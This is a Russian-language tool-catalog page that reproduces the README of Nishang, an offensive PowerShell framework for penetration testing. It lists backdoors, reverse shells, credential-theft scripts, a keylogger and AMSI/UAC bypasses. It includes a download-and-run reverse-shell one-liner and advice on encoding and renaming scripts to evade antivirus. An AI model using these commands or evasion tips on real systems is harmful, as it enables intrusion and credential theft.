Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
nishang — Nishang - Атакующий PowerShell для красных команд, тестирования на проникновение и наступательной безопасности. | Kitploit
Инструменты/GitHubGitHub/samratashok/nishang
Взлом паролейИнструменты фишингаПовышение привилегийГенерация полезной нагрузкиЭксплуатацияЛатеральное перемещениеЭксфильтрация данныхСбор информацииПост-эксплуатацияТестирование на ПроникновениеКомандование и УправлениеRed Teaming
10.0k2.5k3 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHubsamratashok/nishang

nishang

Nishang - Атакующий PowerShell для красных команд, тестирования на проникновение и наступательной безопасности.

Репозиторий

Nishang

Nishang — это фреймворк и коллекция скриптов и полезных нагрузок, которые позволяют использовать PowerShell для наступательной безопасности, пентеста и red teaming. Nishang полезен на всех этапах пентеста.

Автор: Nikhil Mittal Основатель Altered Security — Hands-on red team and enterprise security training!

Использование

Импортируйте все скрипты в текущий сеанс PowerShell (PowerShell v3 и выше).

root@kitploit:~
PS C:\nishang> Import-Module .\nishang.psm1

Используйте отдельные скрипты с dot sourcing.

root@kitploit:~
PS C:\nishang> . C:\nishang\Gather\Get-Information.ps1

PS C:\nishang> Get-Information

Чтобы получить справку по любому скрипту или функции, используйте:

root@kitploit:~
PS C:\nishang> Get-Help [scriptname] -full

Обратите внимание, что справка доступна для функции, загруженной после запуска скрипта, а не для самого скрипта начиная с версии 0.3.8. Во всех случаях имя функции совпадает с именем скрипта.

Например, чтобы просмотреть справку по Get-WLAN-Keys.ps1, используйте

root@kitploit:~
PS C:\nishang> . C:\nishang\Get-WLAN-Keys.ps1

PS C:\nishang> Get-Help Get-WLAN-Keys -Full

Антивирус

Скрипты Nishang многими антивирусами помечаются как вредоносные. Скрипты на цели предназначены для использования в памяти, что очень легко сделать с помощью PowerShell. Два основных метода выполнения скриптов PowerShell в памяти:

Метод 1. Использование загрузки и выполнения в памяти: Используйте следующую команду для выполнения скрипта PowerShell из удаленной оболочки, родной оболочки meterpreter, веб-оболочки и т.д., а также экспортируемой им функции. Все скрипты в Nishang экспортируют функцию с тем же именем в текущий сеанс PowerShell.

root@kitploit:~
powershell iex (New-Object Net.WebClient).DownloadString('http://<yourwebserver>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]

Метод 2. Использование параметра -encodedcommand (или -e) PowerShell Все скрипты в Nishang экспортируют функцию с тем же именем в текущий сеанс PowerShell. Поэтому убедитесь, что вызов функции сделан в самом скрипте при использовании параметра encodedcommand из оболочки, отличной от PowerShell. Для приведенного выше примера добавьте вызов функции (без кавычек) "Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]".

Закодируйте скрипт с помощью Invoke-Encode из Nishang:

root@kitploit:~
PS C:\nishang> . \nishang\Utility\Invoke-Encode

PS C:\nishang> Invoke-Encode -DataToEncode C:\nishang\Shells\Invoke-PowerShellTcp.ps1 -OutCommand

Закодированные данные записаны в .\encoded.txt

Закодированная команда записана в .\encodedcommand.txt

Из указанного выше используйте закодированный скрипт из encodedcommand.txt и запустите его на цели, где могут выполняться команды (удаленная оболочка, родная оболочка meterpreter, веб-оболочка и т.д.). Используйте его следующим образом:

root@kitploit:~
C:\Users\target> powershell -e [encodedscript]

Если скрипты по-прежнему обнаруживаются, поможет изменение имен функций и параметров, а также удаление содержимого справки.

Если AMSI в Windows 10 все еще блокирует выполнение скриптов, смотрите этот блог: http://www.labofapenetrationtester.com/2016/09/amsi.html

Скрипты

Nishang в настоящее время содержит следующие скрипты и полезные нагрузки.

ActiveDirectory

Set-DCShadowPermissions

Изменение объектов AD для предоставления минимальных разрешений, необходимых для DCShadow.

Antak — веб-оболочка

Antak

Выполнение скриптов PowerShell в памяти, выполнение команд, загрузка и скачивание файлов с помощью этой веб-оболочки.

Бэкдоры

HTTP-Backdoor

Бэкдор, который может получать инструкции от сторонних веб-сайтов и выполнять скрипты PowerShell в памяти.

DNS_TXT_Pwnage

Бэкдор, который может получать команды и скрипты PowerShell из DNS TXT-запросов, выполнять их на цели и удаленно управляться с помощью запросов.

Execute-OnTime

Бэкдор, который может выполнять скрипты PowerShell в заданное время на цели.

Gupt-Backdoor

Бэкдор, который может получать команды и скрипты из SSID WLAN без подключения к нему.

Add-ScrnSaveBackdoor

Бэкдор, который может использовать заставку Windows для удаленного выполнения команд и скриптов.

Invoke-ADSBackdoor

Бэкдор, который может использовать альтернативные потоки данных и реестр Windows для обеспечения постоянства.

Add-RegBackdoor

Бэкдор, использующий известный трюк с отладчиком для выполнения полезной нагрузки с помощью Sticky keys и Utilman (Windows key + U).

Set-RemoteWMI

Изменение разрешений пространств имен DCOM и WMI, чтобы предоставить доступ не-администратору.

Set-RemotePSRemoting

Изменение разрешений удаленного взаимодействия PowerShell, чтобы предоставить доступ не-администратору.

Bypass

Invoke-AmsiBypass

Реализация публично известных методов обхода/избегания AMSI.

Client

Out-CHM

Создание зараженных CHM-файлов, которые могут выполнять команды и скрипты PowerShell.

Out-Word

Создание Word-файлов и заражение существующих для выполнения команд и скриптов PowerShell.

Out-Excel

Создание Excel-файлов и заражение существующих для выполнения команд и скриптов PowerShell.

Out-HTA

Создание HTA-файла, который можно развернуть на веб-сервере и использовать в фишинговых кампаниях.

Out-Java

Создание подписанных JAR-файлов, которые можно использовать с апплетами для выполнения скриптов и команд.

Out-Shortcut

Создание файлов ярлыков, способных выполнять команды и скрипты PowerShell.

Out-WebQuery

Создание IQY-файлов для фишинга учетных данных и SMB-хешей.

Out-JS

Создание JS-файлов, способных выполнять команды и скрипты PowerShell.

Out-SCT

Создание SCT-файлов, способных выполнять команды и скрипты PowerShell.

Out-SCF

Создание SCF-файла, который можно использовать для перехвата вызовов NTLM-хешей.

Escalation

Enable-DuplicateToken

Когда требуются привилегии SYSTEM.

Remove-Update

Внедрение уязвимостей путем удаления исправлений.

Invoke-PsUACme

Обход UAC.

Execution

Download-Execute-PS

Скачивание и выполнение скрипта PowerShell в памяти.

Download_Execute

Скачивание исполняемого файла в текстовом формате, преобразование его в исполняемый файл и выполнение.

Execute-Command-MSSQL

Выполнение команд PowerShell, нативных команд или SQL-команд на MSSQL Server с достаточными привилегиями.

Execute-DNSTXT-Code

Выполнение шеллкода в памяти с использованием DNS TXT-запросов.

Out-RundllCommand

Выполнение команд и скриптов PowerShell или обратного сеанса PowerShell с помощью rundll32.exe.

Gather

Check-VM

Проверка на виртуальную машину.

Copy-VSS

Копирование файла SAM с помощью службы теневого копирования томов.

Invoke-CredentialsPhish

Обман пользователя с целью получения учетных данных в открытом виде.

FireBuster FireListener

Пара скриптов для тестирования egress.

Get-Information

Получение ценной информации с цели.

Get-LSASecret

Получение секрета LSA с цели.

Get-PassHashes

Получение хешей паролей с цели.

Get-WLAN-Keys

Получение ключей WLAN в открытом виде с цели.

Keylogger

Логирование нажатий клавиш на цели.

Invoke-MimikatzWdigestDowngrade

Извлечение паролей пользователей в открытом виде на Windows 8.1 и Server 2012

Get-PassHints

Получение подсказок к паролям пользователей Windows с цели.

Show-TargetScreen

Обратное подключение и стриминг экрана цели с использованием MJPEG.

Invoke-Mimikatz

Загрузка mimikatz в память. Обновлено и с некоторыми настройками.

Invoke-Mimikittenz

Извлечение ценной информации из памяти целевых процессов (например, браузеров) с помощью регулярных выражений.

Invoke-SSIDExfil

Эксфильтрация информации, такой как учетные данные пользователя, с использованием SSID WLAN.

Invoke-SessionGopher

Идентификация admin jump-boxes и/или компьютеров, используемых для доступа к Unix-машинам.

MITM

Invoke-Interceptor

Локальный HTTPS-прокси для атак MITM.

Pivot

Create-MultipleSessions

Проверка учетных данных на нескольких компьютерах и создание PSSessions.

Run-EXEonRemote Копирование и выполнение исполняемого файла на нескольких машинах.

Invoke-NetworkRelay Создание сетевых ретрансляторов между компьютерами.

Prasadhak

Prasadhak

Проверка хешей запущенных процессов по базе VirusTotal.

Scan

Brute-Force

Брутфорс FTP, Active Directory, MSSQL и Sharepoint.

Port-Scan

Удобный сканер портов.

Powerpreter

Powerpreter

Все функции Nishang в одном скриптовом модуле.

Shells

Invoke-PsGcat

Отправка команд и скриптов на указанный аккаунт Gmail для выполнения агентом Invoke-PsGcatAgent

Invoke-PsGcatAgent

Выполнение команд и скриптов, отправленных Invoke-PsGcat.

Invoke-PowerShellTcp

Интерактивная обратная или связующая оболочка PowerShell

Invoke-PowerShellTcpOneLine

Урезанная версия Invoke-PowerShellTcp. Также содержит скелетную версию, которая может поместиться в два твита.

Invoke-PowerShellTcpOneLineBind

Связующая версия Invoke-PowerShellTcpOneLine.

Invoke-PowerShellUdp

Интерактивная обратная или связующая оболочка PowerShell через UDP

Invoke-PowerShellUdpOneLine

Урезанная версия Invoke-PowerShellUdp.

Invoke-PoshRatHttps

Обратный интерактивный PowerShell через HTTPS.

Invoke-PoshRatHttp

Обратный интерактивный PowerShell через HTTP.

Remove-PoshRat

Очистка системы после использования Invoke-PoshRatHttps

Invoke-PowerShellWmi

Интерактивный PowerShell с использованием WMI.

Invoke-PowerShellIcmp

Интерактивная обратная оболочка PowerShell через ICMP.

Invoke-JSRatRundll

Интерактивная обратная оболочка PowerShell через HTTP с использованием rundll32.exe.

Invoke-JSRatRegsvr

Интерактивная обратная оболочка PowerShell через HTTP с использованием regsvr32.exe.

Utility

Add-Exfiltration

Добавление возможности эксфильтрации данных в Gmail, Pastebin, веб-сервер и DNS к любому скрипту.

Add-Persistence

Добавление возможности сохранения после перезагрузки к скрипту.

Remove-Persistence

Удаление сохранения, добавленного скриптом Add-Persistence.

Do-Exfiltration

Передайте (|) это любому скрипту для эксфильтрации вывода.

Download

Передача файла на цель.

Parse_Keys

Разбор клавиш, записанных кейлоггером.

Invoke-Encode

Кодирование и сжатие скрипта или строки.

Invoke-Decode

Декодирование и распаковка скрипта или строки из Invoke-Encode.

Start-CaptureServer

Запуск веб-сервера, который логирует Basic-аутентификацию и SMB-хеши.

ConvertTo-ROT13

Кодирование строки в ROT13 или декодирование строки ROT13.

Out-DnsTxt

Генерация DNS TXT-записей, которые можно использовать с другими скриптами.

[Base64ToString]

[StringToBase64]

[ExetoText]

[TexttoExe]

Обновления

Обновления о Nishang можно найти в моем блоге http://labofapenetrationtester.com и в моем Twitter @nikhil_mitt.

Ошибки, отзывы и запросы функций

Пожалуйста, создайте issue, если вы обнаружили ошибку или у вас есть запрос функции. Вы можете написать мне на nikhil [dot] uitrgpv at gmail.com

Список рассылки

Для отзывов, обсуждений и запросов функций присоединяйтесь: http://groups.google.com/group/nishang-users

Вклад

Я всегда ищу контрибьюторов для Nishang. Пожалуйста, отправляйте запросы или пишите мне.

Записи в блоге

Некоторые полезные записи в блоге для начинающих:

http://www.labofapenetrationtester.com/2014/06/nishang-0-3-4.html

http://labofapenetrationtester.com/2012/08/introducing-nishang-powereshell-for.html

http://labofapenetrationtester.com/2013/08/powerpreter-and-nishang-Part-1.html

http://www.labofapenetrationtester.com/2013/09/powerpreter-and-nishang-Part-2.html

Все записи о Nishang:

http://www.labofapenetrationtester.com/search/label/Nishang

Скачать инструмент